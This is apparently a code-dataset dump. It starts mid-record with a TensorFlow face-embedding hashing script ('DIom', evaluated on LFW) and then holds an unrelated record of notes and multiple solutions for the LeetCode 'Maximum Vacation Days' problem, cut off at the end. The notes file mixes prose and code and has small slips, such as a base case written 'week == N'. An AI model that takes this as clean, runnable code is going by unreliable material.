'train')\n else:\n print('Select proper dataset')\n wrapper = wrapper_basicImg(dataset=eval_dataset)\n if eval_dataset == 'YTF':\n image['gallery'], label['gallery'], iterator['gallery'\n ] = load_ytf_data(batch_size, 'train', eval=True)\n image['test'], label['test'], iterator['test'] = load_ytf_data(\n batch_size, 'test')\n elif eval_dataset == 'LFW':\n image['gallery'], label['gallery'], iterator['gallery'\n ] = load_lfw_data(batch_size, 'gallery')\n image['test'], label['test'], iterator['test'] = load_lfw_data(\n batch_size, 'probe')\n embedding_tensor = tf.placeholder(name='img_inputs', shape=[None, 512],\n dtype=tf.float32)\n labels = tf.placeholder(name='label', shape=[None], dtype=tf.int32)\n global_step = tf.Variable(0, trainable=False)\n starter_learning_rate = 0.003\n learning_rate = tf.train.exponential_decay(starter_learning_rate,\n global_step, total_iteration, 0.96)\n with tf.variable_scope('DIom'):\n fc1 = linear(tf.nn.relu(embedding_tensor), 1024, 'fc1')\n fc2 = linear(tf.nn.relu(fc1), 1024, 'fc2')\n fc3 = linear(tf.nn.relu(fc2), m * q, 'fc3')\n h_k = tf.reshape(fc3, [-1, m, q])\n h_k = tf.nn.softmax(beta * h_k, axis=2)\n index_matrix = tf.range(1, q + 1, dtype=tf.float32)\n h = tf.reduce_sum(h_k * index_matrix, axis=2)\n h = tf.reshape(h, [-1, m])\n h_norm = tf.math.l2_normalize(h, axis=1)\n l = tf.one_hot(labels, class_num)\n l = tf.matmul(l, tf.transpose(l))\n l_float = tf.cast(l, tf.float32)\n l = tf.reshape(tf.clip_by_value(l_float, 0.0, 1.0), (-1, 1))\n label_int = tf.cast(tf.squeeze(l, 1), tf.int32)\n inner_prod = tf.reshape(tf.matmul(h_norm, tf.transpose(h_norm)), (-1, 1))\n cos_t = tf.clip_by_value(inner_prod, -1.0, 1.0 - 1e-06)\n theta = tf.math.acos(cos_t)\n sin_t = tf.math.sin(theta)\n cos_mt = tf.math.cos(theta + margin)\n sin_mt = tf.math.sin(theta + margin)\n logit = l * s * tf.concat([sin_t, cos_mt], 1) + (1 - l) * s * tf.concat([\n sin_mt, cos_t], 1)\n l_ij_logit = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=\n logit, labels=label_int)\n c_ij = tf.abs(tf.reduce_mean(h, axis=0) - (q + 1) / 2)\n l_ij = tf.reduce_mean(l_ij_logit)\n c_ij = tf.reduce_mean(c_ij)\n loss = l_ij + lam * c_ij\n gradient = tf.gradients(loss, sin_t)\n t_vars = tf.global_variables()\n train_vars = [var for var in t_vars if 'DIom' in var.name]\n opt_t = tf.train.MomentumOptimizer(learning_rate, momentum=0.9).minimize(\n loss, var_list=train_vars, global_step=global_step)\n with tf.Session() as sess:\n tf.global_variables_initializer().run()\n sess.run(iterator['train'].initializer)\n iteration = sess.run(global_step)\n t_opt = [opt_t, loss, l_ij, c_ij]\n start_time = time.time()\n while iteration != total_iteration:\n img, lbl = sess.run([image['train'], label['train']])\n train_dict = {embedding_tensor: img, labels: lbl}\n _, train_loss, loss_l, loss_c = sess.run(t_opt, feed_dict=\n train_dict)\n iteration += 1\n if iteration % 10000 == 0:\n dist_list = []\n label_list = []\n code_list = []\n while wrapper.samples_left > 0:\n imgs, lbls = wrapper.get_next_batch(100)\n imgs = np.reshape(imgs, [-1, 512])\n eer_dict = {embedding_tensor: imgs}\n code, int_code = sess.run([h_norm, h], feed_dict=eer_dict)\n code = np.reshape(code, [-1, 2, m])\n distance = np.sum(np.prod(code, axis=1), axis=1)\n if dist_list == []:\n dist_list = distance\n label_list = lbls\n code_list = int_code\n else:\n dist_list = np.concatenate((dist_list, distance),\n axis=0)\n label_list = np.concatenate((label_list, lbls), axis=0)\n code_list = np.concatenate((code_list, int_code),\n axis=0)\n wrapper.samples_left = np.size(wrapper.labels, axis=0)\n wrapper.next_batch_pointer = 0\n fpr, tpr, threshold = roc_curve(label_list, dist_list,\n pos_label=1)\n fnr = 1 - tpr\n eer = fpr[np.nanargmin(np.absolute(fnr - fpr))]\n code_arr = np.around(code_list)\n count_arr = []\n for i in range(q):\n count_arr.append(np.count_nonzero(code_arr == i + 1))\n plt.clf()\n plt.bar(range(1, q + 1), count_arr)\n plt.savefig('./plt/code_' + str(iteration) + '.png')\n time_taken = time.time() - start_time\n MAP = 0\n print(\n '[Iteration %d] Train Loss: %.4f, Loss_l: %.4f, Loss_c: %.4f, MAP: %.4f, EER: %.4f, Taken time: %.4f'\n % (iteration, train_loss, loss_l, loss_c, MAP, eer,\n time_taken))\n start_time = time.time()\n",
"step-4": "import tensorflow as tf\nimport numpy as np\nimport time\nimport os\nfrom sklearn.metrics import roc_curve\nimport matplotlib.pyplot as plt\n\n\nfrom src.model import get_args\nfrom src.funcs import linear\nfrom src.youtubeface import load_ytf_data\nfrom src.lfw import load_lfw_data\nfrom src.facescrub import load_fs_data\nfrom src.wrapper_basicImg import wrapper_basicImg\n\n\n\n\nif __name__ == '__main__':\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = '0'\n total_iteration = 300000\n m = 512\n q = 32\n lam = 0.01\n beta = 1.\n margin = 0.5\n s = 32\n batch_size = 256\n class_num = 1595\n train_dataset = 'FS'\n eval_dataset = \"LFW\"\n args = get_args()\n\n ### Get image and label from tfrecord\n image, label, iterator = {}, {}, {}\n if train_dataset == 'YTF':\n image['train'], label['train'], iterator['train'] = load_ytf_data(batch_size, 'train')\n\n elif train_dataset == 'FS':\n image['train'], label['train'], iterator['train'] = load_fs_data(batch_size, 'train')\n\n else:\n print(\"Select proper dataset\")\n\n ### Get evaluation dataset. Wrapper\n wrapper = wrapper_basicImg(dataset=eval_dataset)\n if eval_dataset == 'YTF':\n image['gallery'], label['gallery'], iterator['gallery'] = load_ytf_data(batch_size, 'train', eval=True)\n image['test'], label['test'], iterator['test'] = load_ytf_data(batch_size, 'test')\n\n elif eval_dataset == 'LFW':\n image['gallery'], label['gallery'], iterator['gallery'] = load_lfw_data(batch_size, 'gallery')\n image['test'], label['test'], iterator['test'] = load_lfw_data(batch_size, 'probe')\n\n\n ### Backbone network (Arcface)\n embedding_tensor = tf.placeholder(name='img_inputs', shape=[None, 512], dtype=tf.float32)\n labels = tf.placeholder(name='label', shape=[None, ], dtype=tf.int32)\n\n ### Global step & learning rate\n global_step = tf.Variable(0, trainable=False)\n starter_learning_rate = 0.003\n learning_rate = tf.train.exponential_decay(starter_learning_rate, global_step, total_iteration, 0.96)\n\n ### My implementation (DIom algorithm)\n with tf.variable_scope('DIom'):\n fc1 = linear(tf.nn.relu(embedding_tensor), 1024, 'fc1')\n fc2 = linear(tf.nn.relu(fc1), 1024, 'fc2')\n fc3 = linear(tf.nn.relu(fc2), m * q, 'fc3')\n\n h_k = tf.reshape(fc3, [-1, m, q])\n h_k = tf.nn.softmax(beta * h_k, axis=2)\n\n index_matrix = tf.range(1, q + 1, dtype=tf.float32)\n h = tf.reduce_sum(h_k * index_matrix, axis=2)\n h = tf.reshape(h, [-1, m])\n h_norm = tf.math.l2_normalize(h, axis=1)\n\n ### Loss function\n l = tf.one_hot(labels, class_num)\n l = tf.matmul(l, tf.transpose(l))\n l_float = tf.cast(l, tf.float32)\n l = tf.reshape(tf.clip_by_value(l_float, 0., 1.), (-1, 1))\n label_int = tf.cast(tf.squeeze(l, 1), tf.int32)\n\n inner_prod = tf.reshape(tf.matmul(h_norm, tf.transpose(h_norm)), (-1, 1))\n cos_t = tf.clip_by_value(inner_prod, -1., 1. - 1e-6)\n theta = tf.math.acos(cos_t)\n\n sin_t = tf.math.sin(theta)\n cos_mt = tf.math.cos(theta + margin)\n sin_mt = tf.math.sin(theta + margin)\n\n logit = l * s * (tf.concat([sin_t, cos_mt], 1)) + (1 - l) * s * (tf.concat([sin_mt, cos_t], 1))\n\n l_ij_logit = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logit, labels=label_int)\n c_ij = tf.abs(tf.reduce_mean(h, axis=0) - (q + 1) / 2)\n\n # Baseline pairwise-CE\n # label_ce = tf.cast(labels, tf.float32)\n # l_ij = l * tf.log(tf.square(inner_prod)) + (1 - l) * tf.log(tf.maximum(1e-6, 1 - tf.square(inner_prod)))\n # l_ij = -tf.reduce_mean(l_ij)\n\n # My novel cosine loss\n l_ij = tf.reduce_mean(l_ij_logit)\n c_ij = tf.reduce_mean(c_ij)\n\n loss = l_ij + lam * c_ij\n\n gradient = tf.gradients(loss, sin_t)\n\n ### Optimizer\n t_vars = tf.global_variables()\n train_vars = [var for var in t_vars if 'DIom' in var.name]\n\n\n opt_t = tf.train.MomentumOptimizer(learning_rate, momentum=0.9).minimize(loss, var_list=train_vars, global_step=global_step)\n\n with tf.Session() as sess:\n tf.global_variables_initializer().run()\n sess.run(iterator['train'].initializer)\n\n ### Training\n iteration = sess.run(global_step)\n t_opt = [opt_t, loss, l_ij, c_ij]\n start_time = time.time()\n while iteration != total_iteration:\n img, lbl = sess.run([image['train'], label['train']])\n\n train_dict = {\n embedding_tensor: img,\n labels: lbl\n }\n\n _, train_loss, loss_l, loss_c = sess.run(t_opt, feed_dict=train_dict)\n iteration += 1\n\n if iteration % 10000 == 0:\n ### Evaluation after training\n ### Get gallery hash code\n # gallery = []\n # gallery_label = []\n # sess.run(iterator['gallery'].initializer)\n # try:\n # while True:\n # img, lbl = sess.run([image['gallery'], label['gallery']])\n #\n # gallery_dict = {\n # embedding_tensor: img\n # }\n #\n # hash_code = sess.run(h_norm, feed_dict=gallery_dict)\n #\n # if gallery == []:\n # gallery = hash_code\n # gallery_label = lbl\n # else:\n # gallery = np.concatenate((gallery, hash_code), axis=0)\n # gallery_label = np.concatenate((gallery_label, lbl), axis=0)\n #\n # except tf.errors.OutOfRangeError:\n # pass\n #\n # ### Get probe hash code\n # probe = []\n # probe_label = []\n # code_arr = []\n # sess.run(iterator['test'].initializer)\n # try:\n # while True:\n # img, lbl = sess.run([image['test'], label['test']])\n #\n # gallery_dict = {\n # embedding_tensor: img\n # }\n #\n # code, hash_code = sess.run([h, h_norm], feed_dict=gallery_dict)\n #\n # if probe == []:\n # probe = hash_code\n # probe_label = lbl\n # code_arr = code\n # else:\n # probe = np.concatenate((probe, hash_code), axis=0)\n # probe_label = np.concatenate((probe_label, lbl), axis=0)\n # code_arr = np.concatenate((code_arr, code), axis=0)\n #\n # except tf.errors.OutOfRangeError:\n # pass\n #\n # ### Code frequency\n # code_arr = np.around(code_arr)\n # count_arr = []\n # for i in range(q):\n # count_arr.append(np.count_nonzero(code_arr == i + 1))\n #\n # plt.clf()\n # plt.bar(range(1, q+1), count_arr)\n # plt.savefig('./plt/code_' + str(iteration) + '.png')\n\n # ### Calculate MAP\n # gtp = 40\n # k = 50\n #\n # distance = np.matmul(probe, gallery.T)\n # arg_idx = np.argsort(-distance, axis=1)\n #\n # max_label = gallery_label[arg_idx[:, :k]]\n # match_matrix = np.equal(max_label, probe_label[:,np.newaxis])\n #\n # tp_seen = match_matrix * np.cumsum(match_matrix, axis=1)\n # ap = np.sum(tp_seen / np.arange(1, k + 1)[np.newaxis, :], axis=1) / gtp\n # MAP = np.mean(ap)\n\n ### Calculate EER\n dist_list = []\n label_list = []\n code_list = []\n while wrapper.samples_left > 0:\n imgs, lbls = wrapper.get_next_batch(100)\n\n imgs = np.reshape(imgs, [-1, 512])\n\n eer_dict = {\n embedding_tensor: imgs\n }\n\n code, int_code = sess.run([h_norm, h], feed_dict=eer_dict)\n code = np.reshape(code, [-1, 2, m])\n\n distance = np.sum(np.prod(code, axis=1), axis=1)\n\n if dist_list == []:\n dist_list = distance\n label_list = lbls\n code_list = int_code\n\n else:\n dist_list = np.concatenate((dist_list, distance), axis=0)\n label_list = np.concatenate((label_list, lbls), axis=0)\n code_list = np.concatenate((code_list, int_code), axis=0)\n\n wrapper.samples_left= np.size(wrapper.labels, axis=0)\n wrapper.next_batch_pointer = 0\n\n fpr, tpr, threshold = roc_curve(label_list, dist_list, pos_label=1)\n fnr = 1 - tpr\n # eer_threshold = threshold(np.nanargmin(np.absolute((fnr - fpr))))\n eer = fpr[np.nanargmin(np.absolute((fnr - fpr)))]\n\n ### Code frequency\n code_arr = np.around(code_list)\n count_arr = []\n for i in range(q):\n count_arr.append(np.count_nonzero(code_arr == i + 1))\n\n plt.clf()\n plt.bar(range(1, q + 1), count_arr)\n plt.savefig('./plt/code_' + str(iteration) + '.png')\n\n time_taken = time.time() - start_time\n MAP = 0\n # print(\"good\")\n print(\"[Iteration %d] Train Loss: %.4f, Loss_l: %.4f, Loss_c: %.4f, MAP: %.4f, EER: %.4f, Taken time: %.4f\"\n % (iteration, train_loss, loss_l, loss_c, MAP, eer, time_taken))\n\n start_time = time.time()\n\n # np.save('CP.npy', np.concatenate((fpr[np.newaxis, :], tpr[np.newaxis, :]), axis=0))\n ### Save model.\n # save_vars = [var for var in t_vars if 'DIom' in var.name]\n # saver = tf.train.Saver(var_list=save_vars)\n # saver.save(sess, './model/DIom_layer')",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
'''
LeetCode wants to give one of its best employees the option to travel among n cities to collect algorithm problems. But all work and no play makes Jack a dull boy, you could take vacations in some particular cities and weeks. Your job is to schedule the traveling to maximize the number of vacation days you could take, but there are certain rules and restrictions you need to follow.
Rules and restrictions:
You can only travel among n cities, represented by indexes from 0 to n - 1. Initially, you are in the city indexed 0 on Monday.
The cities are connected by flights. The flights are represented as an n x n matrix (not necessarily symmetrical), called flights representing the airline status from the city i to the city j. If there is no flight from the city i to the city j, flights[i][j] == 0; Otherwise, flights[i][j] == 1. Also, flights[i][i] == 0 for all i.
You totally have k weeks (each week has seven days) to travel. You can only take flights at most once per day and can only take flights on each week's Monday morning. Since flight time is so short, we do not consider the impact of flight time.
For each city, you can only have restricted vacation days in different weeks, given an n x k matrix called days representing this relationship. For the value of days[i][j], it represents the maximum days you could take a vacation in the city i in the week j.
You could stay in a city beyond the number of vacation days, but you should work on the extra days, which will not be counted as vacation days.
If you fly from city A to city B and take the vacation on that day, the deduction towards vacation days will count towards the vacation days of city B in that week.
We do not consider the impact of flight hours on the calculation of vacation days.
Given the two matrices flights and days, return the maximum vacation days you could take during k weeks.
'''
First convert flights to a graph represented by adjacency lists. An edge exists between two cities if there is a flight connecting them. And also include the source city in destination list since we can stay at the source city.
Then dp[week][city] recurrence: dp[w][c] = days[c][w] + max(dp[w+1][dest] for dest in g[c]).
It's easier to use bottom up here since the starting point (week 0) is fixed instead of ending point. Using bottom up, we can get the maximum value for week 0 in our dp table.
Eventually since we start at city 0, answer is the max days from city 0's destinations (in day 0, you can spend rest days of week 0 in city 0 or other cities connected to city 0)
def maxVacationDays(flights, days):
n, k = len(days), len(days[0])
g = [[j for j, dst in enumerate(city) if dst]+[i] for i, city in enumerate(flights)]
dp = [[0] * n for _ in range(k+1)]
for w in range(k)[::-1]:
for c in range(n):
dp[w][c] = days[c][w] + max(dp[w+1][dst] for dst in g[c])
return max(dp[0][dst] for dst in g[0])
-------------------------------------------------------------------------
Intuition:
We can tell this is a DP problem since subproblems of our original problem will overlap. For example, in some week i, we could be able to fly to some city j from multiple other cities, depending on if there valid flights or not.
We'll use what city we are in, and what week it is as our state values. So, dp(week, city) will tell us the maximum vacation time from this city and week.
Our base case will be if the week is past k, in which case we return 0.
Our recurrance relation will consider traveling to every possible city that we can fly to, and also consider not traveling at all. For each place we travel to, we can calculate the value of staying there as days[city][week], plus dp(week + 1, city), where city is our destination after traveling (or not traveling).
Then, we just need to solve for dp(0,0).
Code:
def maxVacationDays(self, flights: List[List[int]], days: List[List[int]]) -> int:
k = len(days[0])
@lru_cache(None)
def dp(week, city):
# we are past the amount of weeks we are traveling for
if week == k:
return 0
# consider not traveling (notice city is our original city)
best = days[city][week] + dp(week + 1, city)
for j in range(len(flights[0])):
if flights[city][j] == 0:
# if we can't travel to this city, skip it
continue
# consider traveling to city j as the answer
best = max(best, days[j][week] + dp(week + 1, j))
# return the maximal value of all possibilities
return best
return dp(0,0)
Analysis:
O(n^2 * k) time from n * k states values to calulate, times n time to calculate each state.
O(n * k) space, since we have n * k states to memoize.
----------------------------------------------------------------------------------------------------
Viterbi Algorithm
# Find the longest path on a Week (Row) x City (Col) Table
def maxVacationDays(self, flights: List[List[int]], days: List[List[int]]) -> int:
n, k = len(days), len(days[0]) # days: city x week
dp = [[float('-inf')] * n for _ in range(k)] # dp: week x city
dp[0][0] = days[0][0]
for d in range(1, n): # week 0 can be any city having a flight
if flights[0][d] == 1: dp[0][d] = days[d][0]
for t in range(1, k):
for c in range(n):
for d, hasflight in enumerate(flights[c]):
if hasflight or c == d:
dp[t][d] = max(dp[t][d], dp[t-1][c] + days[d][t])
return max(dp[-1])
-------------------------------------------------------------------------------------------------------------
We consider each city of each day as node. Thus, there are N * k + 2 nodes including the dummy start node and the dummy end node. We connect each node if there is a flight, or if they are the same city. (It means that he just stays at the same city.) After connecting all the possible edges, I performed BFS starting from the dummy start node to find the longest path to all the nodes. The answer is the longest path from the start node to the end node.
Note that in this problem, we are considering the maximum value, so it's not shortest path but longest path.
class Graph:
def __init__(self, num):
self.V = num
self.edges = [[] for _ in range(num)]
self.dists = [-math.inf for _ in range(num)]
def add_edge(self, a, b, w):
self.edges[a].append([b, w])
def bfs(self, start):
queue = deque([start])
self.dists[start] = 0
while queue:
u = queue.popleft()
for ad, dist in self.edges[u]:
new_dist = self.dists[u] + dist
if new_dist > self.dists[ad]:
self.dists[ad] = new_dist
queue.append(ad)
return self.dists[-1]
class Solution:
def maxVacationDays(self, flights: List[List[int]], days: List[List[int]]) -> int:
N, k = len(flights), len(days[0])
#construct graph
g = Graph(N * k + 2)
for i in range(N): #first day
if i == 0 or flights[0][i]:
g.add_edge(N * k, i, days[i][0])
for d in range(1, k): #middle days
for i in range(N):
for j in range(N):
if i == j or flights[i][j] == 1:
g.add_edge(N * (d - 1) + i, N * d + j, days[j][d])
for i in range(N): #final day
g.add_edge(N * (k - 1) + i, N * k + 1, 0)
return g.bfs(start=N * k)
-------------------------------------------------------------------------------------------------------
Let's maintain best[i], the most vacation days you can have ending in city i on week t. At the end, we simply want max(best), the best answer for any ending city.
For every flight i -> j (including staying in the same city, when i == j), we have a candidate answer best[j] = best[i] + days[j][t], and we want the best answer of those.
When the graph is sparse, we can precompute flights_available[i] = [j for j, adj in enumerate(flights[i]) if adj or i == j] instead to save some time, but this is not required.
def maxVacationDays(self, flights, days):
NINF = float('-inf')
N, K = len(days), len(days[0])
best = [NINF] * N
best[0] = 0
for t in xrange(K):
cur = [NINF] * N
for i in xrange(N):
for j, adj in enumerate(flights[i]):
if adj or i == j:
cur[j] = max(cur[j], best[i] + days[j][t])
best = cur
return max(best)
--------------------------------------------------------------------------------------
hought process
Recursive backtracking
def backtrack(week, city):
backtrack(week, city) = max(stay: days[city][week] + backtrack(week+1, city), fly: max(backtrack(week+1, other) + days[other][week]) for flights[city][other] == 1)
flights can be optimized using adjacency list
base case: week == N, return 0
because there is no state change, we can use memoization
be careful that even if working in a city all week, it can still provide more opportunites for more vacation in future (because maybe you can only fly to other city and cannot come back, but future weeks in this city may have many vacations)
just try everything possible!
Iterative solution is also simple
Top-down DP
import functools
class Solution:
def maxVacationDays(self, flights: List[List[int]], days: List[List[int]]) -> int:
N, K = len(days), len(days[0])
flights = [[i for i, can_fly in enumerate(city) if can_fly]
for city in flights]
@functools.lru_cache(None)
def backtrack(week, city):
if week == K:
return 0
stay = days[city][week] + backtrack(week+1, city)
fly = max((days[other][week] + backtrack(week+1, other)
for other in flights[city]), default=0)
return max(stay, fly)
return backtrack(0, 0)
Bottom-up DP
def maxVacationDays(self, flights: List[List[int]], days: List[List[int]]) -> int:
N, K = len(days), len(days[0])
flights = [[i for i, can_fly in enumerate(city) if can_fly]
for city in flights]
dp = [[0] * N for _ in range(K+1)]
for week in range(K-1, -1, -1):
for city in range(N):
stay = days[city][week] + dp[week+1][city]
fly = max((days[other][week] + dp[week+1][other]
for other in flights[city]), default=0)
dp[week][city] = max(stay, fly)
return dp[0][0]
O(K) space optimization
def maxVacationDays(self, flights: List[List[int]], days: List[List[int]]) -> int:
N, K = len(days), len(days[0])
flights = [[i for i, can_fly in enumerate(city) if can_fly]
for city in flights]
dp = [0] * N
cur = dp[:]
for week in range(K-1, -1, -1):
for city in range(N):
stay = days[city][week] + dp[city]
fly = max((days[other][week] + dp[other]
for other in flights[city]), default=0)
cur[city] = max(stay, fly)
dp, cur = cur, dp
return dp[0]
--------------------------------------------------------------------------------
class Solution:
def maxVacationDays(self, flights: List[List[int]], days: List[List[int]]) -> int:
n = len(flights)
nexts = collections.defaultdict(list)
for i in range(n):
nexts[i].append(i)
for j in range(n):
if flights[i][j]:
nexts[i].append(j)
m = len(days[0])
minHeap = [(0,0)]
for weeks in range(m):
visited = set()
temp = []
while len(temp) < n and minHeap:
vac,city = heapq.heappop(minHeap)
for nxt in nexts[city]:
if nxt not in visited:
visited.add(nxt)
heapq.heappush(temp,(vac-days[nxt][weeks],nxt))
minHeap = temp
vac,city = heapq.heappop(minHeap)
return -vac
|
normal
|
{
"blob_id": "aa7cf08b40b2a13e39003f95e5e0ce7335cbdba2",
"index": 1766,
"step-1": "'''\nLeetCode wants to give one of its best employees the option to travel among n cities to collect algorithm problems. But all work and no play makes Jack a dull boy, you could take vacations in some particular cities and weeks. Your job is to schedule the traveling to maximize the number of vacation days you could take, but there are certain rules and restrictions you need to follow.\n\nRules and restrictions:\n\nYou can only travel among n cities, represented by indexes from 0 to n - 1. Initially, you are in the city indexed 0 on Monday.\nThe cities are connected by flights. The flights are represented as an n x n matrix (not necessarily symmetrical), called flights representing the airline status from the city i to the city j. If there is no flight from the city i to the city j, flights[i][j] == 0; Otherwise, flights[i][j] == 1. Also, flights[i][i] == 0 for all i.\nYou totally have k weeks (each week has seven days) to travel. You can only take flights at most once per day and can only take flights on each week's Monday morning. Since flight time is so short, we do not consider the impact of flight time.\nFor each city, you can only have restricted vacation days in different weeks, given an n x k matrix called days representing this relationship. For the value of days[i][j], it represents the maximum days you could take a vacation in the city i in the week j.\nYou could stay in a city beyond the number of vacation days, but you should work on the extra days, which will not be counted as vacation days.\nIf you fly from city A to city B and take the vacation on that day, the deduction towards vacation days will count towards the vacation days of city B in that week.\nWe do not consider the impact of flight hours on the calculation of vacation days.\nGiven the two matrices flights and days, return the maximum vacation days you could take during k weeks.\n'''\n\n\nFirst convert flights to a graph represented by adjacency lists. An edge exists between two cities if there is a flight connecting them. And also include the source city in destination list since we can stay at the source city.\n\nThen dp[week][city] recurrence: dp[w][c] = days[c][w] + max(dp[w+1][dest] for dest in g[c]).\nIt's easier to use bottom up here since the starting point (week 0) is fixed instead of ending point. Using bottom up, we can get the maximum value for week 0 in our dp table.\n\nEventually since we start at city 0, answer is the max days from city 0's destinations (in day 0, you can spend rest days of week 0 in city 0 or other cities connected to city 0)\n\ndef maxVacationDays(flights, days):\n\tn, k = len(days), len(days[0])\n\tg = [[j for j, dst in enumerate(city) if dst]+[i] for i, city in enumerate(flights)]\n\tdp = [[0] * n for _ in range(k+1)]\n\tfor w in range(k)[::-1]:\n\t\tfor c in range(n):\n\t\t\tdp[w][c] = days[c][w] + max(dp[w+1][dst] for dst in g[c])\n\treturn max(dp[0][dst] for dst in g[0])\n\n\n-------------------------------------------------------------------------\nIntuition:\nWe can tell this is a DP problem since subproblems of our original problem will overlap. For example, in some week i, we could be able to fly to some city j from multiple other cities, depending on if there valid flights or not.\n\nWe'll use what city we are in, and what week it is as our state values. So, dp(week, city) will tell us the maximum vacation time from this city and week.\n\nOur base case will be if the week is past k, in which case we return 0.\n\nOur recurrance relation will consider traveling to every possible city that we can fly to, and also consider not traveling at all. For each place we travel to, we can calculate the value of staying there as days[city][week], plus dp(week + 1, city), where city is our destination after traveling (or not traveling).\n\nThen, we just need to solve for dp(0,0).\n\nCode:\n\ndef maxVacationDays(self, flights: List[List[int]], days: List[List[int]]) -> int:\n\tk = len(days[0])\n\t\n\t@lru_cache(None)\n\tdef dp(week, city):\n\t # we are past the amount of weeks we are traveling for\n\t\tif week == k:\n\t\t\treturn 0 \n\t\t\t\n\t\t# consider not traveling (notice city is our original city)\n\t\tbest = days[city][week] + dp(week + 1, city)\n\t\t\n\t\tfor j in range(len(flights[0])):\n\t\t\tif flights[city][j] == 0:\n\t\t\t\t# if we can't travel to this city, skip it\n\t\t\t\tcontinue\n\t\t\t\t\n\t\t\t# consider traveling to city j as the answer\n\t\t\tbest = max(best, days[j][week] + dp(week + 1, j))\n\t\t\t\n\t\t# return the maximal value of all possibilities\n\t\treturn best\n\treturn dp(0,0)\nAnalysis:\n\nO(n^2 * k) time from n * k states values to calulate, times n time to calculate each state.\nO(n * k) space, since we have n * k states to memoize.\n\n\n----------------------------------------------------------------------------------------------------\nViterbi Algorithm\n # Find the longest path on a Week (Row) x City (Col) Table\n\ndef maxVacationDays(self, flights: List[List[int]], days: List[List[int]]) -> int:\n \n n, k = len(days), len(days[0]) # days: city x week\n \n dp = [[float('-inf')] * n for _ in range(k)] # dp: week x city \n \n dp[0][0] = days[0][0] \n for d in range(1, n): # week 0 can be any city having a flight\n if flights[0][d] == 1: dp[0][d] = days[d][0]\n\n for t in range(1, k):\n for c in range(n):\n for d, hasflight in enumerate(flights[c]):\n if hasflight or c == d:\n dp[t][d] = max(dp[t][d], dp[t-1][c] + days[d][t])\n\n return max(dp[-1])\n \n -------------------------------------------------------------------------------------------------------------\n We consider each city of each day as node. Thus, there are N * k + 2 nodes including the dummy start node and the dummy end node. We connect each node if there is a flight, or if they are the same city. (It means that he just stays at the same city.) After connecting all the possible edges, I performed BFS starting from the dummy start node to find the longest path to all the nodes. The answer is the longest path from the start node to the end node.\n\nNote that in this problem, we are considering the maximum value, so it's not shortest path but longest path.\n\nclass Graph:\n def __init__(self, num):\n self.V = num\n self.edges = [[] for _ in range(num)]\n self.dists = [-math.inf for _ in range(num)]\n \n def add_edge(self, a, b, w):\n self.edges[a].append([b, w])\n \n def bfs(self, start):\n queue = deque([start])\n self.dists[start] = 0\n \n while queue:\n u = queue.popleft()\n for ad, dist in self.edges[u]:\n new_dist = self.dists[u] + dist\n if new_dist > self.dists[ad]:\n self.dists[ad] = new_dist\n queue.append(ad)\n return self.dists[-1]\n \nclass Solution:\n def maxVacationDays(self, flights: List[List[int]], days: List[List[int]]) -> int:\n N, k = len(flights), len(days[0])\n #construct graph\n g = Graph(N * k + 2)\n for i in range(N): #first day\n if i == 0 or flights[0][i]:\n g.add_edge(N * k, i, days[i][0])\n for d in range(1, k): #middle days\n for i in range(N):\n for j in range(N):\n if i == j or flights[i][j] == 1:\n g.add_edge(N * (d - 1) + i, N * d + j, days[j][d])\n for i in range(N): #final day\n g.add_edge(N * (k - 1) + i, N * k + 1, 0)\n \n return g.bfs(start=N * k)\n-------------------------------------------------------------------------------------------------------\nLet's maintain best[i], the most vacation days you can have ending in city i on week t. At the end, we simply want max(best), the best answer for any ending city.\n\nFor every flight i -> j (including staying in the same city, when i == j), we have a candidate answer best[j] = best[i] + days[j][t], and we want the best answer of those.\n\nWhen the graph is sparse, we can precompute flights_available[i] = [j for j, adj in enumerate(flights[i]) if adj or i == j] instead to save some time, but this is not required.\n\ndef maxVacationDays(self, flights, days):\n NINF = float('-inf')\n N, K = len(days), len(days[0])\n best = [NINF] * N\n best[0] = 0\n \n for t in xrange(K):\n cur = [NINF] * N\n for i in xrange(N):\n for j, adj in enumerate(flights[i]):\n if adj or i == j:\n cur[j] = max(cur[j], best[i] + days[j][t])\n best = cur\n return max(best)\n \n --------------------------------------------------------------------------------------\n hought process\nRecursive backtracking\n\ndef backtrack(week, city):\n\nbacktrack(week, city) = max(stay: days[city][week] + backtrack(week+1, city), fly: max(backtrack(week+1, other) + days[other][week]) for flights[city][other] == 1)\nflights can be optimized using adjacency list\nbase case: week == N, return 0\nbecause there is no state change, we can use memoization\n\nbe careful that even if working in a city all week, it can still provide more opportunites for more vacation in future (because maybe you can only fly to other city and cannot come back, but future weeks in this city may have many vacations)\n\njust try everything possible!\n\nIterative solution is also simple\n\nTop-down DP\nimport functools\n\n\nclass Solution:\n def maxVacationDays(self, flights: List[List[int]], days: List[List[int]]) -> int:\n N, K = len(days), len(days[0])\n flights = [[i for i, can_fly in enumerate(city) if can_fly] \n\t\t for city in flights]\n @functools.lru_cache(None)\n def backtrack(week, city):\n if week == K:\n return 0\n stay = days[city][week] + backtrack(week+1, city)\n fly = max((days[other][week] + backtrack(week+1, other) \n for other in flights[city]), default=0)\n return max(stay, fly)\n return backtrack(0, 0)\nBottom-up DP\n def maxVacationDays(self, flights: List[List[int]], days: List[List[int]]) -> int:\n N, K = len(days), len(days[0])\n flights = [[i for i, can_fly in enumerate(city) if can_fly] \n\t\t for city in flights]\n dp = [[0] * N for _ in range(K+1)]\n for week in range(K-1, -1, -1):\n for city in range(N):\n stay = days[city][week] + dp[week+1][city]\n fly = max((days[other][week] + dp[week+1][other]\n for other in flights[city]), default=0)\n dp[week][city] = max(stay, fly)\n return dp[0][0]\nO(K) space optimization\n def maxVacationDays(self, flights: List[List[int]], days: List[List[int]]) -> int:\n N, K = len(days), len(days[0])\n flights = [[i for i, can_fly in enumerate(city) if can_fly]\n for city in flights]\n dp = [0] * N\n cur = dp[:]\n for week in range(K-1, -1, -1):\n for city in range(N):\n stay = days[city][week] + dp[city]\n fly = max((days[other][week] + dp[other]\n for other in flights[city]), default=0)\n cur[city] = max(stay, fly)\n dp, cur = cur, dp\n return dp[0]\n \n--------------------------------------------------------------------------------\nclass Solution:\n def maxVacationDays(self, flights: List[List[int]], days: List[List[int]]) -> int:\n n = len(flights)\n nexts = collections.defaultdict(list)\n for i in range(n):\n nexts[i].append(i)\n for j in range(n):\n if flights[i][j]:\n nexts[i].append(j)\n m = 